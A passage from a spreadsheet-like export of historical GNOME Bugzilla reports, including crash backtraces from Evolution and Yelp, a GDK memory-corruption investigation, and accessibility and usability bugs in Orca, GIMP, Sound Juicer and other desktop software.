#41 0xf3a7288 in gtk_marshal_NONE__NONE (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:312
#42 0xf3e3294 in gtk_signal_real_emit (object=0x10165d10 signal_id=91 
    params=0x7fffef00) at gtksignal.c:1440
#43 0xf3e0a48 in gtk_signal_emit (object=0x10165d10 signal_id=91)
    at gtksignal.c:552
#44 0xf32b714 in gtk_button_released (button=0x10165d10) at gtkbutton.c:327
#45 0xf32cc24 in gtk_button_button_release (widget=0x10165d10 
    event=0x1015c7f0) at gtkbutton.c:721
#46 0xf3a6e04 in gtk_marshal_BOOL__POINTER (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:28
#47 0xf3e3448 in gtk_signal_real_emit (object=0x10165d10 signal_id=48 
    params=0x7ffff380) at gtksignal.c:1492
#48 0xf3e0a48 in gtk_signal_emit (object=0x10165d10 signal_id=48)
    at gtksignal.c:552
#49 0xf4276ec in gtk_widget_event (widget=0x10165d10 event=0x1015c7f0)
    at gtkwidget.c:2864
#50 0xf3a6d18 in gtk_propagate_event (widget=0x10165d10 event=0x1015c7f0)
    at gtkmain.c:1378
#51 0xf3a589c in gtk_main_do_event (event=0x1015c7f0) at gtkmain.c:818
#52 0xf27ae18 in gdk_event_dispatch (source_data=0x0 current_time=0x20 
    user_data=0x7efffa88) at gdkevents.c:2139
#53 0xee88db4 in g_main_dispatch (dispatch_time=0x7ffff778) at gmain.c:656
#54 0xee89420 in g_main_iterate (block=269258720 dispatch=1) at gmain.c:877
#55 0xee89664 in g_main_run (loop=0x100dce78) at gmain.c:935
#56 0xf3a5064 in gtk_main () at gtkmain.c:524
#57 0xfaf8afc in bonobo_main () at bonobo-main.c:283
#58 0x10058ae8 in main (argc=3 argv=0x7ffff9a4) at main.c:141
#59 0xed540f8 in __libc_start_main (argc=3 ubp_av=0x7ffff9a4 
    ubp_ev=0x7efffa88 auxvec=0x7ffffa4c rtld_fini=0 stinfo=0x1009d700 
    stack_on_entry=0x0) at ../sysdeps/powerpc/elf/libc-start.c:119
Thread 1 (Thread 19860 (manager thread)):
#0  0xee0227c in __syscall_poll () at soinit.c:64
#1  0xedfa524 in __poll (fds=0x4 nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#2  0xef0cc1c in __pthread_manager (arg=0x4) at manager.c:148
#3  0xee0211c in clone () at soinit.c:64
0xeddc0b0	64	in soinit.c
#0  0xeddc0b0 in wait4 () at soinit.c:64
64	in soinit.c
__CTOR_LIST__ = {0xffffffff}
__DTOR_LIST__ = {0xffffffff}
__EH_FRAME_BEGIN__ = 0xee56c64 
#1  0xeddc064 in __libc_waitpid (pid=512 stat_loc=0x7fffd6f8 options=0)
    at ../sysdeps/unix/sysv/linux/waitpid.c:26
No locals.
#2  0xef12e38 in waitpid (pid=19929 stat_loc=0x7fffd6f8 options=0)
    at wrapsyscall.c:173
result = 0
oldtype = 0
#3  0xf73cdb0 in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 0
in_segv = 1
pid = 512
#4  0x10058930 in segv_redirect (sig=11) at main.c:67
67			gnome_segv_handler (sig)
No locals.
#5  0xef100b4 in pthread_sighandler (signo=11 ctx=0x7fffd790) at signals.c:97
self = 0xef28f80
in_sighandler = 0x0
#6  
No symbol table info available.
#7  0xed66d68 in kill () at soinit.c:64
__CTOR_LIST__ = {0xffffffff}
__DTOR_LIST__ = {0xffffffff}
__EH_FRAME_BEGIN__ = 0xee56c64 
</t>
  </si>
  <si>
    <t>EVOLUTION-225526</t>
  </si>
  <si>
    <t>Crash: evolution error</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.3
Synopsis: evolution error
Bugzilla-Product: Evolution
Bugzilla-Component: Contacts [was: Addressbook]
Description:
see previous page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New Thread 1024 (LWP 2434)]
0x420b4769 in wait4 () from /lib/i686/libc.so.6
#0  0x420b4769 in wait4 () from /lib/i686/libc.so.6
#1  0x4213030c in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x40ebcca3 in waitpid () from /lib/i686/libpthread.so.0
#3  0x40981ff8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#4  0x080a08b3 in segv_redirect ()
#5  0x40ebaf75 in pthread_sighandler () from /lib/i686/libpthread.so.0
#6  
#7  0x400638aa in decode_token () from /usr/lib/libcamel.so.0
#8  0x40065b3f in header_content_type_decode () from /usr/lib/libcamel.so.0
#9  0x40046d22 in set_mime_type () from /usr/lib/libcamel.so.0
#10 0x40046def in camel_data_wrapper_set_mime_type ()
   from /usr/lib/libcamel.so.0
#11 0x4005bf88 in camel_mime_message_init () from /usr/lib/libcamel.so.0
#12 0x400693a0 in camel_object_new () from /usr/lib/libcamel.so.0
#13 0x4005c18a in camel_mime_message_new () from /usr/lib/libcamel.so.0
#14 0x080a98e5 in build_message ()
#15 0x080af254 in e_msg_composer_get_message_draft ()
#16 0x080aafcc in autosave_save_draft ()
#17 0x40e9b0d1 in g_hash_table_foreach () from /usr/lib/libglib-1.2.so.0
#18 0x080ab5a7 in autosave_run ()
#19 0x40e9f691 in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
#20 0x40e9e773 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#21 0x40e9ed39 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#22 0x40e9eeec in g_main_run () from /usr/lib/libglib-1.2.so.0
#23 0x40c222e3 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#24 0x403f203c in bonobo_main () from /usr/lib/libbonobo.so.2
#25 0x080a0aeb in main ()
#26 0x42017499 in __libc_start_main () from /lib/i686/libc.so.6
#0  0x420b4769 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4213030c in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x40ebcca3 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x40981ff8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x080a08b3 in segv_redirect ()
No symbol table info available.
#5  0x40ebaf75 in pthread_sighandler () from /lib/i686/libpthread.so.0
No symbol table info available.
#6  
No symbol table info available.
#7  0x400638aa in decode_token () from /usr/lib/libcamel.so.0
No symbol table info available.
Unknown reporter: rcampos@cnio.es changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>rcampos</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-260865</t>
  </si>
  <si>
    <t>Error getting book view / Backend busy - when accessing to contacts window</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Slackware Slackware 10.0.0
Package: Evolution-Data-Server
Priority: Major
Version: GNOME2.6.2 0.94.1
Gnome-Distributor: GNOME.Org
Synopsis: Error getting book view / Backend busy - when accessing to contacts window
Bugzilla-Product: Evolution-Data-Server
Bugzilla-Component: Contacts
Bugzilla-Version: 0.94.1
Description:
Description of Problem:
Always get a popup window:
Error getting book view
Backend busy
when accessing to contacts window
Steps to reproduce the problem:
1. open a new mail window
2. select to button
Actual Results:
Expected Results:
How often does this happen?
all the time
Additional Information:
evolution-1.5.9.1
evolution-data-server-0.0.94.1
gal-2.1.10
gtkhtml-3.1.16
libsoup-2.1.11
from a terminal (when opening contact window):
loading error file
/usr/share/evolution/1.5/errors/addressbook-errors.xml
loading error file /usr/share/evolution/1.5/errors/calendar-errors.xml
loading error file /usr/share/evolution/1.5/errors/filter-errors.xml
loading error file
/usr/share/evolution/1.5/errors/mail-composer-errors.xml
loading error file /usr/share/evolution/1.5/errors/mail-errors.xml
loading error file /usr/share/evolution/1.5/errors/e-system-errors.xml
loading error file /usr/share/evolution/1.5/errors/shell-errors.xml
(evolution-1.5:10930): Gtk-CRITICAL **: file gtkwindow.c: line 1883
(gtk_window_set_transient_for): assertion `parent == NULL ||
GTK_IS_WINDOW (parent)' failed
Unknown reporter: hylix@free.fr changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>hylix</t>
  </si>
  <si>
    <t>ORCA-347691</t>
  </si>
  <si>
    <t>In standard print dialog printer table items not always spoken/displayed</t>
  </si>
  <si>
    <t>Please describe the problem:
When you get into the standard print dialog (e.g. the one belonging to Evolution and Gedit) focus is automatically placed in the table of printers.  At this point pressing Up or Down Arrow moves you to another printer but that printer name is not spoken or displayed.  If you Arrow one or two more times printer names are then spoken and displayed as expected.
Steps to reproduce:
1. Launch Gedit or Evolution
2. Press Control P for the Print dialog.  The currently selected printer is spoken/displayed correctly.
3. Press Up or Down Arrow ONCE to move to a different printer.  The currently selected printer is not spoken/displayed.
4. Continue to press Up or Down Arrow.  After one or two more presses printers are correctly spoken/displayed as they get selected.
Actual results:
(Outlined in the steps above)
Expected results:
The selected printer would always be spoken/displayed.
Does this happen every time?
Yes on both of my machines.
Other information:
This is with Orca 0.2.6 but I *believe* the problem was present in 0.2.5 as well.</t>
  </si>
  <si>
    <t>GIMP-133532</t>
  </si>
  <si>
    <t>Image Map Plug-in Leaves PIDs</t>
  </si>
  <si>
    <t>I ran Image Map twice in one gimp session and carefully File --&gt;Quit -ed
each time yet there are still running PIDs when i type ps ax into a bash
shell.
 3941 pts/2    S      0:00 /usr/local/lib/gimp/1.3/plug-ins/script-fu -gimp
6 5 -run 1
 3979 pts/2    S      0:05 /usr/local/lib/gimp/1.3/plug-ins/imagemap -gimp
8 6 -run 1
 3993 pts/2    S      0:12 /usr/local/lib/gimp/1.3/plug-ins/imagemap -gimp
10 8 -run 1</t>
  </si>
  <si>
    <t>BANSHEE-518772</t>
  </si>
  <si>
    <t>hal-ipod-info should set properties for ipod</t>
  </si>
  <si>
    <t>Didn't find a bugzilla for libipoddevice so dumping it here.
With the new gvfs hal volume monitor certain properties are read from the hal
 info.desktop.icon  # an icon name
 info.desktop.name  # the name to use for the device
that can be set both the storage and volume device objects. The hal-ipod-info callout should set these properties after it has investigated the ipod. For example
 info.desktop.icon -&gt; multimedia-player-ipod-video-white
 info.desktop.name -&gt; David Zeuthen's iPod
on the device object representing the drive (e.g. /dev/sda) and then presto this icon (including fallbacks) and name will be used throughout the desktop for all of it's volumes.
(Btw in passing I thought i should mention that the gphoto2 backend just got merged into gvfs. That means that MTP devices are now available through gio just as if they were mass storage device. We still need to implement writing it's read-only at the moment.)</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-397088</t>
  </si>
  <si>
    <t>Useless information alert when removing theme</t>
  </si>
  <si>
    <t>After successfully removing a theme an alert pops up saying 
Theme deleted succesfully. Please select another theme.. 
This alert has a Cancel and an Ok button which do nothing when clicked and another theme becomes automatically selected. 
This problem could be solved by removing the cancel button but telling the user Everything is fine is pointless so i propose to remove this alert box.</t>
  </si>
  <si>
    <t>GEDIT-722119</t>
  </si>
  <si>
    <t>Support for updated dialog style</t>
  </si>
  <si>
    <t>Here are some patches to support the new gtk dialog style once it
lands.
https://bugzilla.gnome.org/show_bug.cgi?id=720059</t>
  </si>
  <si>
    <t>YELP-171760</t>
  </si>
  <si>
    <t>Gnome help crashed when Searching for a word on a help page</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 3 (Heidelberg)
Package: gnome-utils
Severity: normal
Version: GNOME2.8.0 2.6.3
Gnome-Distributor: Red Hat Inc
Synopsis: Gnome help crashed when Searching for a word on a help page
Bugzilla-Product: gnome-utils
Bugzilla-Component: gdict
Bugzilla-Version: 2.6.3
BugBuddy-GnomeVersion: 2.0 (2.8.0)
Description:
Description of the crash:
Ctrl+F and entere the word to search highlighted then got the crash.
Steps to reproduce the crash:
1. Open Help from Firefox Change Master Password window
2. Open Certificates page
3. Search for a word like Certificates
Expected Results:
No crash.
How often does this happen?
Just once for now.
Additional Information:
Sorry the traces don't have much debugging info except the methods on
the stack.
Debugging Information:
Backtrace was generated from '/usr/bin/gnome-help'
(no debugging symbols found)...Using host libthread_db library
/lib/tls/libthread_db.so.1.
(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Thread debugging using libthread_db enabled]
[New Thread -1208522080 (LWP 16523)]
(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0x009b87a2 in _dl_sysinfo_int80
() from /lib/ld-linux.so.2
#0  0x009b87a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x00c22403 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#2  0x004baf50 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#3  
#4  0x005a02e5 in _html_view_get_cursor_box_text ()
   from /usr/lib/libgtkhtml-2.so.0
#5  0x005a31c8 in html_view_get_type () from /usr/lib/libgtkhtml-2.so.0
#6  0x05bc1757 in gtk_marshal_VOID__UINT_STRING ()
   from /usr/lib/libgtk-x11-2.0.so.0
#7  0x001d86b2 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#8  0x001d8347 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#9  0x001ee646 in g_signal_has_handler_pending ()
   from /usr/lib/libgobject-2.0.so.0
#10 0x001ef913 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#11 0x001eff5a in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#12 0x05cb5545 in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#13 0x05bc0031 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#14 0x0042578f in gdk_window_clear_area_e () from
/usr/lib/libgdk-x11-2.0.so.0
#15 0x00425828 in gdk_window_process_all_updates ()
   from /usr/lib/libgdk-x11-2.0.so.0
#16 0x004258a7 in gdk_window_process_all_updates ()
   from /usr/lib/libgdk-x11-2.0.so.0
#17 0x00d7ab5a in g_child_watch_add () from /usr/lib/libglib-2.0.so.0
#18 0x00d777bb in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#19 0x00d79242 in g_main_context_acquire () from
/usr/lib/libglib-2.0.so.0
#20 0x00d794ef in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#21 0x06ffcdd5 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#22 0x0805b713 in main ()
Thread 1 (Thread -1208522080 (LWP 16523)):
#0  0x009b87a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00c22403 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x004baf50 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x005a02e5 in _html_view_get_cursor_box_text ()
   from /usr/lib/libgtkhtml-2.so.0
No symbol table info available.
#5  0x005a31c8 in html_view_get_type () from /usr/lib/libgtkhtml-2.so.0
No symbol table info available.
#6  0x05bc1757 in gtk_marshal_VOID__UINT_STRING ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#7  0x001d86b2 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0x001d8347 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x001ee646 in g_signal_has_handler_pending ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0x001ef913 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x001eff5a in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x05cb5545 in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#13 0x05bc0031 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#14 0x0042578f in gdk_window_clear_area_e () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#15 0x00425828 in gdk_window_process_all_updates ()
   from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#16 0x004258a7 in gdk_window_process_all_updates ()
   from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#17 0x00d7ab5a in g_child_watch_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#18 0x00d777bb in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#19 0x00d79242 in g_main_context_acquire () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#20 0x00d794ef in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#21 0x06ffcdd5 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#22 0x0805b713 in main ()
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2005-03-26 21:38 -------
Unknown version 2.6.3 in product gnome-utils.  Setting version to unspecified.
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product gnome-utils.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was sabiq@csociety.org.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>sabiq</t>
  </si>
  <si>
    <t>GTK+-316137</t>
  </si>
  <si>
    <t>suspected memory corruption in gdkscreen.c</t>
  </si>
  <si>
    <t>I suspect that memory corruption is happening in gtk+/gdk/gdkscreen.c.
This problem is causing some programs on Solaris like gnome-panel and
nautilus to crash.  This problem does not seem to happen on Linux or
perhaps the problem causes different symptoms on Linux due to memory
layout differences.
I think the problem may have something to do with _gdk_x11_screen_new
in gtk+/gdk/x11/gdkscreen-x11.c is calling this line:
  screen = g_object_new (GDK_TYPE_SCREEN_X11 NULL)
Which then causes the following function to get called:
static void
gdk_screen_init (GdkScreen *screen)
{
    screen-&gt;resolution = -1
}
I'm not sure if it is safe to try to set a member of a structure
in the midst of calling g_object_new on the same data structure. 
Perhaps this is the problem?  I'm not sure though.  If it isn't
clear what is causing the memory corruption from this report I'm
happy to run additional tests or provide more information.
Here is how I tracked down the nature of this problem.
Some programs like gnome-panel and nautilus fail on this call in
g_param_spec_double() in glib/gobject/gparamspecs.c:
 1765     dspec = g_param_spec_internal (G_TYPE_PARAM_DOUBLE
 1766                                    name
 1767                                    nick
 1768                                    blurb
 1769                                    flags)
In g_param_spec_internal in gparam.c it fails on this test:
 333    g_return_val_if_fail (G_TYPE_IS_PARAM (param_type) &amp;&amp;
                              param_type != G_TYPE_PARAM NULL)
Note the macros are defined as follows:
#define G_TYPE_IS_PARAM (type)  (G_TYPE_FUNDAMENTAL (type) == G_TYPE_PARAM)
#define G_TYPE_FUNDAMENTAL(type)        (g_type_fundamental (type))
The g_type_fundamental function looks as follows:
GType
g_type_fundamental (GType type_id)
{
  TypeNode *node = lookup_type_node_I (type_id)
  return node ? NODE_FUNDAMENTAL_TYPE (node) : 0
}
I also note that in gparamspecs.h G_TYPE_PARAM_DOUBLE is defined to be
g_param_spec_types[13].  Printing this out in dbx shows a value of:
   135869312U
Next I get the memory location of the node.
(dbx) print lookup_type_node_I(135869312U)
lookup_type_node_I(135869312U) = 0x8193380
So now I put a DBX watchpoint on this memory point (the wb causes the
watch to trigger on write events before the memory is written).
(dbx) stop access wb 0x8193380 sizeof(_TypeNode)
I notice immediately before the following call at line 106 of
gdkscreen.c:
  106       screen-&gt;resolution = -1
That the memory has the more sane values of:
*((struct _TypeNode *) 0x8193380) = {
    plugin                       = (nil)
    n_children                   = 0
    n_supers                     = 1U
    _prot_n_ifaces_prerequisites = 0
    is_classed                   = 1U
    is_instantiatable            = 1U
    mutatable_check_cache        = 1U
    children                     = (nil)
    data                         = 0x8193558
    qname                        = 38U
    global_gdata                 = 0x8192c50
    _prot                        = {
        iface_entries  = (nil)
        prerequisistes = (nil)
    }
    supers                       = (135869312U)
}
and after this call the values are stomped as follows:
*node = {
    plugin                       = (nil)
    n_children                   = 0
    n_supers                     = 0
    _prot_n_ifaces_prerequisites = 0
    is_classed                   = 0
    is_instantiatable            = 0
    mutatable_check_cache        = 0
    children                     = 0xbff00000
    data                         = 0x8193558
    qname                        = 38U
    global_gdata                 = 0x8192c50
    _prot                        = {
        iface_entries  = (nil)
        prerequisistes = (nil)
    }
    supers                       = (135869312U)
}
With the followin gstack trace.
  [1] gdk_screen_init(screen = 0x8193270) line 106 in gdkscreen.c
=&gt;[2] type_class_init_Wm(node = 0x81a86e0 pclass = 0x8194618) line 1844 in
gtype.c
  [3] g_type_class_ref(type = 135956192U) line 2405 in gtype.c
  [4] g_type_class_ref(type = 135956304U) line 2399 in gtype.c
  [5] g_object_newv(object_type = 135956304U n_parameters = 0 parameters =
(nil)) line 824 in gobject.c
  [6] g_object_new_valist(object_type = 135956304U first_property_name = (nil)
var_args = 0x804745c) line 951 in gobject.c
  [7] g_object_new(object_type = 135956304U first_property_name = (nil) ...)
line 789 in gobject.c
  [8] _gdk_x11_screen_new(display = 0x81a85c8 screen_number = 0) line 482 in
gdkscreen-x11.c
  [9] gdk_display_open(display_name = (nil)) line 183 in gdkdisplay-x11.c
  [10] gdk_display_open_default_libgtk_only() line 272 in gdk.c
  [11] gtk_init_check(argc = 0x804759c argv = 0x80475a0) line 717 in gtkmain.c
  [12] gtk_init(argc = 0x804759c argv = 0x80475a0) line 752 in gtkmain.c
  [13] bonobo_ui_gtk_post_args_parse(0x8196cd8 0xd0d8a000) at 0xd0d411f3 
  [14] gnome_program_postinit(0x8196cd8) at 0xd0c8c0b6 
  [15] gnome_program_init_common(0x81945a8 0x81516d8 0x81516e4 0xd0e9d508
0x1 0x8047aec 0x81516ec 0x8047a98 0xffffffff 0x0) at 0xd0c8c7b0 
  [16] gnome_program_init(0x81516d8 0x81516e4 0xd0e9d508 0x1 0x8047aec
0x81516ec 0x813f8f8 0x817df5c 0x817df68 0x817df70 0x817df80 0x817df88
0x817df94 0x817dfa0 0x817dfac 0x0) at 0xd0c8c34c 
  [17] main(0x1 0x8047aec 0x8047af4) at 0x80a72aa 
It seems bad that a call to set screen-&gt;resolution is affecting a defined
GType structure.  I'm giving this a somewhat elevated priority since GNOME
is basically useless on Solaris with this bug.</t>
  </si>
  <si>
    <t>SOUND-JUICER-113671</t>
  </si>
  <si>
    <t>Can't handle single quote in track title</t>
  </si>
  <si>
    <t>Sound Juicer can't handle a single quote in the track title.  If the title
contains a single quote the title becomes an emptry string in both the
filename and vorbiscomment.</t>
  </si>
  <si>
    <t>GNOPERNICUS-160772</t>
  </si>
  <si>
    <t>gnoeprnicus layer 3+7 not working correctly on the desktop</t>
  </si>
  <si>
    <t>Using gnopernicus 0.9.17
 - Enable gnopernicus with speech enabled
 - Ensure that the numlock key is on.
 - Press 0 3 on the numpad to go to layer 3
 - Press 7 for the 'Read whole window' function
Notice that speech will begin saying the icon names
on the desktop.
 - Press  to stop interrupt.
Notice that speech will stop.
 - Press 02 to go to layer 2.
Notice that when pressing the numpad keys again gnopernicus
just continues where it left off on the window review. 
This doesn't appear to happen anywhere else but on the desktop.</t>
  </si>
  <si>
    <t>LSR-434636</t>
  </si>
  <si>
    <t>getPrevAcc() returns wrong element on first table cell</t>
  </si>
  <si>
    <t>getPrevAcc() returns the wrong element when the task_por is on the first table cell (row 0 col 0).  Currently getPrevAcc() returns the last cell of the same table instead of the previous accessible in the tree.
Note:  This bug was found in Firefox.  GTK tables have not been tested.</t>
  </si>
  <si>
    <t>ORCA-356911</t>
  </si>
  <si>
    <t>Orca generates a traceback with Numpad-Minus when positioned at the end of a line.</t>
  </si>
  <si>
    <t>Steps to reproduce:
* Run Orca.
* Run an application like gedit.
* Type in some text.
* Position the cursor at the end of a line.
* Press Numpad+- (Numpad Minus).
The following traceback is generated:
Traceback (most recent call last):
  File /usr/lib/python2.5/site-packages/orca/input_event.py line 178 in processInputEvent
    consumed = self._function(script inputEvent)
  File /usr/lib/python2.5/site-packages/orca/default.py line 2457 in toggleFlatReviewMode
    self._reviewCurrentItem(inputEvent self.targetCursorCell)
  File /usr/lib/python2.5/site-packages/orca/default.py line 2831 in _reviewCurrentItem
    if (len(string) == 0) or (string == \n):
TypeError: non-mapping object of type 'NoneType' has no len()</t>
  </si>
  <si>
    <t>GTK-ENGINES-322208</t>
  </si>
  <si>
    <t>Crash in Clearlooks</t>
  </si>
  <si>
    <t>Version details: all Gnome from cvs HEAD
Distribution/Version: Mandrake 10.2
gdb stack trace :-
 gdb gnumeric
GNU gdb 6.0-2mdk (Mandrake Linux)
Copyright 2003 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as i586-mandrake-linux-gnu...Using host libthread_db
library /lib/tls/libthread_db.so.1.
(gdb) run
Starting program: /usr/bin/gnumeric
[Thread debugging using libthread_db enabled]
[New Thread -1230620000 (LWP 9166)]
Fontconfig error: conf.d line 1: no element found
*** attempt to put segment in horiz list twice
*** attempt to put segment in horiz list twice
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1230620000 (LWP 9166)]
clearlooks_set_widget_parameters (widget=Variable widget is not available.
) at ./src/clearlooks_style.c:204
204             params-&gt;focus      = GTK_WIDGET_HAS_FOCUS (widget)
(gdb) thread apply all bt
Thread 1 (Thread -1230620000 (LWP 9166)):
#0  clearlooks_set_widget_parameters (widget=Variable widget is not available.
) at ./src/clearlooks_style.c:204
#1  0xb6a0d43b in draw_shadow (style=0x839c108 window=0x83b51e0
state_type=GTK_STATE_NORMAL
    shadow_type=GTK_SHADOW_NONE area=0x0 widget=0x0 detail=0xb7ea1872
GnmItemBarCell x=0
    y=-9 width=65 height=10) at ./src/clearlooks_style.c:296
#2  0xb76d40dc in IA__gtk_paint_shadow (style=Variable style is not available.
) at gtkstyle.c:5708
#3  0xb7c984dc in item_bar_draw (item=0x8378bb0 drawable=0x83b51e0
expose=0xbff0a980)
    at item-bar.c:537
#4  0xb7bb60cd in foo_canvas_group_draw (item=0x8378a30 drawable=0x83b51e0
expose=0xbff0a980)
    at foo-canvas.c:1495
#5  0xb7bb852c in foo_canvas_expose (widget=0x83788f8 event=0xbff0a980) at
foo-canvas.c:2887
#6  0xb766f67c in _gtk_marshal_BOOLEAN__BOXED (closure=0x80789b8
return_value=0xbff0a5f0
    n_param_values=2 param_values=0xbff0a6cc invocation_hint=0xbff0a5dc
marshal_data=Variable marshal_data is not available.
)
    at gtkmarshalers.c:83
#7  0xb6c8e6c7 in g_type_class_meta_marshal (closure=Variable closure is not
available.
) at gclosure.c:567
#8  0xb6c8ed1a in IA__g_closure_invoke (closure=Variable closure is not available.
) at gclosure.c:490
#9  0xb6c9ea13 in signal_emit_unlocked_R (node=Variable node is not available.
) at gsignal.c:2487
#10 0xb6c9fec6 in IA__g_signal_emit_valist (instance=0x83788f8
signal_id=Variable signal_id is not available.
) at gsignal.c:2218
#11 0xb6ca048e in IA__g_signal_emit (instance=0x83788f8 signal_id=54 detail=0)
at gsignal.c:2252
#12 0xb7764faa in gtk_widget_event_internal (widget=Variable widget is not
available.
) at gtkwidget.c:3735
#13 0xb766dd6e in IA__gtk_main_do_event (event=Variable event is not available.
) at gtkmain.c:1364
#14 0xb74efed7 in gdk_window_process_updates_internal (window=Variable window
is not available.
) at gdkwindow.c:2220
#15 0xb74effc3 in IA__gdk_window_process_all_updates () at gdkwindow.c:2273
#16 0xb74f0064 in gdk_window_update_idle (data=0x0) at gdkwindow.c:2141
#17 0xb6c0a381 in g_idle_dispatch (source=0x83b5d58 callback=Variable
callback is not available.
) at gmain.c:3761
#18 0xb6c08054 in IA__g_main_context_dispatch (context=0x806a260) at gmain.c:1913
#19 0xb6c0b1dc in g_main_context_iterate (context=Variable context is not
available.
) at gmain.c:2544
#20 0xb6c0b4c8 in IA__g_main_loop_run (loop=Variable loop is not available.
) at gmain.c:2748
#21 0xb6d7541e in bonobo_main () at bonobo-main.c:312
#22 0x0804bce6 in main (argc=1 argv=0xbff0ac84) at main-application.c:462</t>
  </si>
  <si>
    <t>GSTREAMER-310423</t>
  </si>
  <si>
    <t>gst-launch documentation misleading</t>
  </si>
  <si>
    <t>Documentation bug
Section: gst-launch man page examples
               gst-launch cdparanoia ! mpegaudio ! filesink location=cd.mp3
       Rip  all  tracks  from  compact disc and convert them into a single mp3
       file
       Using gst-inspect(1) it is possible to discover settings  for  cdpara-
       noia that will tell it to rip individual tracks.
Correct version:
It should have an example of using cdparanoia to rip individual tracks. I've
spent a couple of hours trying to discover the correct settings.
Other information:
I know this has to do with ignorance as to how the plugin settings interact with
each other but it's still hard to figure out. In fact I still haven't figured
it out and haven't been able to find good documentation on this subject. Does
anyone know the correct settings?
Thanks Seth</t>
  </si>
  <si>
    <t>GNUMERIC-115552</t>
  </si>
  <si>
    <t>format selector widgets can be improved</t>
  </si>
  <si>
    <t>The attached screen shot says it all. (It's a part of the text import dialog.)</t>
  </si>
  <si>
    <t>GTK-DOC-62050</t>
  </si>
  <si>
    <t>reporting all undocumented symbols</t>
  </si>
  <si>
    <t>Here is a patch to make gtkdoc-mkdb report all undocumented symbols
instead of only the functions/macros.
This may again cause problems for the script generating developer.gnome.org/doc/API/status.shtml
since I replaced function by symbol in some messages. We'll see.
If that script was available somewhere I could adjust it as necessary.</t>
  </si>
  <si>
    <t>ATK-606888</t>
  </si>
  <si>
    <t>libatk needs to link against libintl</t>
  </si>
  <si>
    <t>Created attachment 151360
Link libatk against libintl
Building atk-1.28.0 on OS X 10.4 with -no-undefined fails:
